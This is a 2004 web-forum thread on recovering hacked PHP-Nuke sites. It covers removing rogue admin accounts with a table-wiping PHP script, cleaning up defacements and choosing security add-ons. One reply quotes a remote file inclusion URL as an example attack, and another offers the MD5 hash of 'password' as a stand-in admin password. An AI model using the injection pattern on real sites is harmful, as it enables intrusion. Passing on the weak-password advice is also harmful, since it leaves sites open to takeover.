You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 313 guest(s) and 14 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - (read first) If your site hacked [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Fri Jul 30, 2004 2:56 pm Reply with quoteBack to top

- Please read this topic before you create new topic about "hacked site".
- Next, use search for any matches criteria that you looking for.


New unauthorized admin account has been created
  1. Run your database tool (e.g. phpMyAdmin).
  2. Open a database belongs to PHP-Nuke tables. In phpMyAdmin, it listed in left side panel.
  3. Open {nuke}_authors table, replace {nuke} with your actual $prefix name defined in config.php.
  4. Delete all records listed in this table.
  5. Close/logout from your database tool.
  6. Go to your site and run admin.php.
  7. When prompted, enter new admin account (admin nick, name, password, email, etc).
  8. Done.

If you has no database tool or has no idea on how to use it, create the script below and save it as emptyadmins.php then upload to your PHP-Nuke root directory.
Code:
<?php
require_once("mainfile.php");
if (!isset($prefix)) die('config.php not loaded properly.');
if (!isset($db)) die('database layer not loaded properly.');

$sql = "DELETE FROM " . $prefix . "_authors";
$result = $db->sql_query($sql);
if ($result) {
  echo "All administrator accounts has been removed.<br/>";
  echo "Now run admin.php to create new admin account.";
} else {
  echo "Unable to access to database.";
}
?>

Then, run this script from your browser, e.g:
Code:
http://mysite.com/emptyadmins.php

Exclamation Remove/delete the script when no loger needed. Exclamation


My index.php has been tampered or showing a hacker message
  1. Login as admin, and go to PHP-Nuke administration menu.
  2. Click on "Messages" icon.
  3. Check foe every site messages by clicking on "edit" link.
  4. Remove any unnecessary message text, or delete the message.
  5. Done.


A frame shown at the bottom of my site's page
  1. Login as admin, and go to PHP-Nuke administration menu.
  2. Click on "Preferences" icon.
  3. Remove any unnecessary foot text.
  4. Done.


One or some of your script files has changed
  1. Replace modified file with original one on your local machine.
  2. Patch or upgrade your modules that containing upload feature.


Securing PHP-Nuke
  1. Apply patches for your current PHP-Nuke version. (nukesecurity resources)
  2. Install one or more PHP-Nuke security add-ons: (alphabetical orders)

  3. Check for Hacker Assassins PHP-Nuke combo package that shipped with latest ChatServ's patches and some security add-ons.
  4. Keep watching on Waraxe Forum for PHP-Nuke expoits.
  5. Visit some security sites such as Security Tracker, Security Focus, and Secunia for latest advisories regarding to PHP-Nuke exploits and vulnerabilities.
  6. Keep monitoring for new and upcoming PHP-Nuke exploits and vulnerabilities.


Which the best security add-on suitable for my site?
KGuske has a comparison table for common PHP-Nuke security add-on.
Visit this link for more details: http://www.freesoftwarereviews.org/modules.php?name=News&file=article&sid=2


Last update: August 10th, 2004

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
ExtremeGamer
Nuke Soldier
Nuke Soldier


Joined: Jan 27, 2003
Posts: 25

Location: USA

PostPosted: Tue Aug 24, 2004 3:32 pm Reply with quoteBack to top

Not only was my siter hacked. I cannot change the language as you will see here.

http://www.impa-gscrb.org/html

EG Very Happy
Find all posts by ExtremeGamerView user's profileSend private messageSend e-mailVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
FourRed3s
Private
Private


Joined: Aug 09, 2004
Posts: 39


PostPosted: Mon Oct 18, 2004 10:06 am Reply with quoteBack to top

After the dust settled: (this has been edited)

When you delete the records in your authers table, you will have to enter a new record for a new admininstration person. This has to be done in the database. I used phpmyadmin. You will have to provide an encrypted password. This was given to me by a very nice peson: 5f4dcc3b5aa765d61d8327deb882cf99

Copy and paste that into the field for password. It is the word password. This will let you log in and then first thing go to the user admin part of your administation panel and change your password.

Otherwise, you are stuck in a nasty lupe! and no way out but the method above or delete the damn thing and start over which is what I was about to do.

Following is my rant. and what started this whole thing.

someone entered an admin user id in authers table;

aid = waxx
name = God
url = blank
email = waxx@was.here
pwd = whateverheputhereitisencryptedsoicantreadit

So I did NOT create a new topic about "hacked site". Oh no I did what I was told here: Steps 1 - 8 Done.

And NOW.............................
I would like to login BUT now the security image is GONE!!!!!!!!!!!!!!!!!!!

The only way to get the secruity image back is to go to phpmyadmin and add the user id direirctly to the table. For some reason admin.php does NOT enter the information that you enter into the database anymore. Okay so I enter it manually into the database, fine I can do that.

THen geuss waht happens..........................
The security image is back but the passwoed that is entered into the table for authers using phpmyadmin is NOT encrypted or something like that and even if you go back to your database and put NOTHING in the password field --------- you still cant log in.

WHAT IS GOING ON??????????????? I WAS TRYING TO PROTECT MYSELF FROM HACKERS USING THAT host.deny METHOD ONLY TO FIND OUT WEEKS LATER THAT IT DOESN'T WORK ON APACHE SERVERS. SO I WAS TOLD TO USE .htaccess METHOD.

I GUESS THAT DOESN'T WORK EITHER!!!!!!!!!!!!!

This is just little town's chamber of commerce site. We have no money so all work on this since August of this year has been for nothing. And now our site is ruined.

What did we do to anybody to deserve this???????????????
Find all posts by FourRed3sView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Mon Oct 18, 2004 7:14 pm Reply with quoteBack to top

Hackers do what hackers do... sorry your seems to have been destroyed by them. Keep backups and keep your site up-to-date with the latest patches and security addons. Nothing is 100% secure, so always have backups.

.htaccess does work on Apache servers, but only if you use the correct instructions and use a security addon that will write banned IPs to it.

So he used another admin hack.. I believe this is addressed here: http://www.nukecops.com/postt35530.html

If you've done everything possible to secure your site, there's nothing more you can do except keep working to get your site back and active.

Best of luck

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
FourRed3s
Private
Private


Joined: Aug 09, 2004
Posts: 39


PostPosted: Tue Oct 19, 2004 6:28 am Reply with quoteBack to top

You are right and thanks for the empathy. I downloaded the 7.5 version of phpnuke about two weeks ago. I paid $10. I was going to use it on another civic organization but I think I will remove this site that is compromised and maybe try to salvage my calendar info and new stories info and --- start from scratch.

I downloaded something called Admin Secure that is mentioned on this site. However, the instructions for installing it are. . . . I don't have a word, but I read it and feel like I am missing "chuncks" of information that the writers of the script expect me to already know. And I find it intimidating. Besides that, if I put this "security" add on to a program that is already broken, I know that would be wasting my time.

Anyway, thanks for listening to me and understanding. I have never had this happen before. I have been very fortunate. I am learning something new everyday here. --- Thanks to all --- Smile
Find all posts by FourRed3sView user's profileSend private message
chiumanfu
Nuke Soldier
Nuke Soldier


Joined: Jun 08, 2003
Posts: 18


PostPosted: Tue Oct 19, 2004 8:41 am Reply with quoteBack to top

Get PHPnuke 7.4-patched and Sentinel 2.1.0 from here
http://nukeresources.com/downloads-cat97.html

I suggest using 7.4 because 7.5 requires some work to get your old modules to work properly. If you not comfortable installing adminsecure, I don't think you'll be able to upgrade your modules for 7.5

Here is the Sentinel installation and user guide
http://www.nukescripts.net/modules.php?name=User_Guide
Find all posts by chiumanfuView user's profileSend private message
stanny
Nuke Soldier
Nuke Soldier


Joined: Oct 08, 2004
Posts: 18


PostPosted: Tue Oct 26, 2004 6:15 am Reply with quoteBack to top

According to the post, I downloaded admin secure. Now my users can't view my custom modules that have hotlinked files in them. It says detecting cross server scripting or something like that. Is there anyway to uninstall admin secure? Please help someone.
Find all posts by stannyView user's profileSend private message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Tue Oct 26, 2004 8:03 am Reply with quoteBack to top

stanny wrote:
According to the post, I downloaded admin secure. Now my users can't view my custom modules that have hotlinked files in them. It says detecting cross server scripting or something like that. Is there anyway to uninstall admin secure? Please help someone.

Put this line at the beginning of your mainfile.php to deactivate Admin Secure (without uninstalling it):
Code:
define('ASEC_SHUTDOWN', 1);


ps:
May I know what module that causing such problem?

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
stanny
Nuke Soldier
Nuke Soldier


Joined: Oct 08, 2004
Posts: 18


PostPosted: Wed Oct 27, 2004 9:38 pm Reply with quoteBack to top

I think the problem is that because I linked modules through another folder in the module directory. It was like "modules.php?name=post/id1". So I linked them without activating any module. It worked fine before I installed admin secure.

Another problem I faced is that when I changed passwords for the super user, it won't let me log in anymore. Any idea how to fix this? It says account temporary suspended.

Admin secure is great, but its really giving me a hard time lol.
Find all posts by stannyView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Oct 27, 2004 10:38 pm Reply with quoteBack to top

You will need to go into Admin Secure (using the authorization codes if needed) and approve your admin changes there.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806


PostPosted: Thu Oct 28, 2004 11:14 am Reply with quoteBack to top

stanny wrote:
I think the problem is that because I linked modules through another folder in the module directory. It was like "modules.php?name=post/id1". So I linked them without activating any module. It worked fine before I installed admin secure.

You can deactivating "Filter External Linking" option in Admin Secure configuration. But be aware that attacker can inject your site by executing external script from outer domain. For example:
Code:
modules.php?name=http://somesite/injectfile.php


stanny wrote:
Another problem I faced is that when I changed passwords for the super user, it won't let me log in anymore. Any idea how to fix this? It says account temporary suspended.

You need to approve admin account every time they're created or modified. It can be done from Admin Secure "Account Approval" page.

stanny wrote:
Admin secure is great, but its really giving me a hard time lol.

Well, I knew that. Smile
It advisable to adjust "Filter Proofing" option in configuration page into either "God Admin" or "All Administrator" and put your IP address into "Exclude System" listed IP.

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
stanny
Nuke Soldier
Nuke Soldier


Joined: Oct 08, 2004
Posts: 18


PostPosted: Wed Nov 10, 2004 8:14 pm Reply with quoteBack to top

Heya guys, its me again. I am abit afraid this time lol. Although I have admin secure running, people still say there are tons of ways to exploit my site and stuff. Would you recommend another security system in addition to admin secure? Say Sentinal? The others?
Find all posts by stannyView user's profileSend private message
HalJordan
Support Staff
Support Staff


Joined: Aug 07, 2004
Posts: 1117

Location: Somewhere around Hunan, China

PostPosted: Wed Nov 10, 2004 8:17 pm Reply with quoteBack to top

Sentinel is really good, now in version 2.1.1. I use it and AS1.7. Protector is also very useful.

_________________
Obedezco, pero no cumplo.

Proprietor, www.computernewbie.info
Support staff, www.nukecops.com
Find all posts by HalJordanView user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
stanny
Nuke Soldier
Nuke Soldier


Joined: Oct 08, 2004
Posts: 18


PostPosted: Wed Nov 10, 2004 8:26 pm Reply with quoteBack to top

Awesome, I read protector's page and they say it blocks all sort of attacks like cookie, injections and stuff. But the thing is, it is recomended to install so much security systems besides just sticking to one? Won't it slow the site down?

On a side note: When I uploaded the phpnuke program to my webspace, .htaccess was not uploadable because it started with "." so I renamed it to htaccess instead. I din't do anything wrong did I(regarding security)?

Thanks.
Find all posts by stannyView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 10, 2004 10:50 pm Reply with quoteBack to top

Yes, multiple addons will slow your system down. But if you have a good host, it really should be able to keep up with all your scripts Smile

On your server, you can rename the file back to .htaccess

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 1.138 Seconds - 217 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::